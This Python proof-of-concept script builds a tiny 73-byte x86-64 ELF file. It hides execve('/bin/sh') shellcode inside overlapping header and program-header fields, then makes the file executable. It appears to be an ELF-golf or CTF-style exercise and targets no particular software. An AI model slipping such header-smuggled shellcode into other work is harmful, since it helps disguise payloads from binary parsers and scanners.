
poc.py
from elf import *
from pwn import p8, p16, p32, u64
from subprocess import run

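# Output path for the generated image; used for both the write and the chmod.
OUT_PATH = "poc.elf"

# Single 73-byte image.  `Header` and `Segment` are mapped onto this same
# bytearray (ctypes-style `from_buffer`), so every field assignment below
# writes straight into `elf`; the program header starts at `phoff`.
elf = bytearray([0] * 73)
phoff = 12
header = Header.from_buffer(elf)
segment = Segment.from_buffer(elf, phoff)

# Minimal valid header: magic, dynamic type, x86-64 machine, one program header.
header.e_ident[constants.EI_MAG0] = constants.ELFMAG0
header.e_ident[constants.EI_MAG1] = constants.ELFMAG1
header.e_ident[constants.EI_MAG2] = constants.ELFMAG2
header.e_ident[constants.EI_MAG3] = constants.ELFMAG3
header.e_type = constants.ET_DYN
header.e_machine = 0x3e
header.e_phnum = 1
header.e_phoff = phoff
header.e_ehsize = sizeof(Header)
header.e_phentsize = sizeof(Segment)
# Not a real section-table offset: this field is populated from raw bytes that
# are part of the payload laid out in the image.
header.e_shoff = u64(p8(0x31) + p8(0xc0) + p8(0xb0) + p8(0x3b) + p8(0x0f) + p8(0x05) + b"\x00\x00")

# NOTE: the header and segment structs overlap in the buffer, so the order of
# these assignments is significant — do not reorder them.
segment.p_type = 1
header.e_entry = segment.p_vaddr
segment.p_offset |= phoff
# Likewise not an alignment value; the field carries a raw string.
segment.p_align = u64(b"/bin/sh\x00")

# Last two bytes of the image (0x47..0x49 == 71..73).
elf[0x47:0x49] = p8(0xeb) + p8((-0x49 + 4) & 0xff)

# Bytes placed over e_ident[4:12]; they must fit in the 8 bytes after the magic.
sc = b""
sc += p8(0x0f) + p8(0x05)
sc += p8(0x48) + p8(0x8d) + p8(0x79) + p8(0x40 - 0x0a)
sc += p8(0xeb) + p8(0x28 - 0x0c)
# A plain raise (not `assert`) so the size check survives `python -O`.
if len(sc) > 8:
    raise ValueError(f"shellcode must fit in ident ({len(sc)})")
elf[4:4 + len(sc)] = sc

dump(header)
dump(segment)

# Close the handle deterministically instead of relying on GC.
with open(OUT_PATH, "wb") as out:
    out.write(elf)
# Argument list instead of a shell string: no shell involved, same effect.
run(["chmod", "+x", OUT_PATH], check=True)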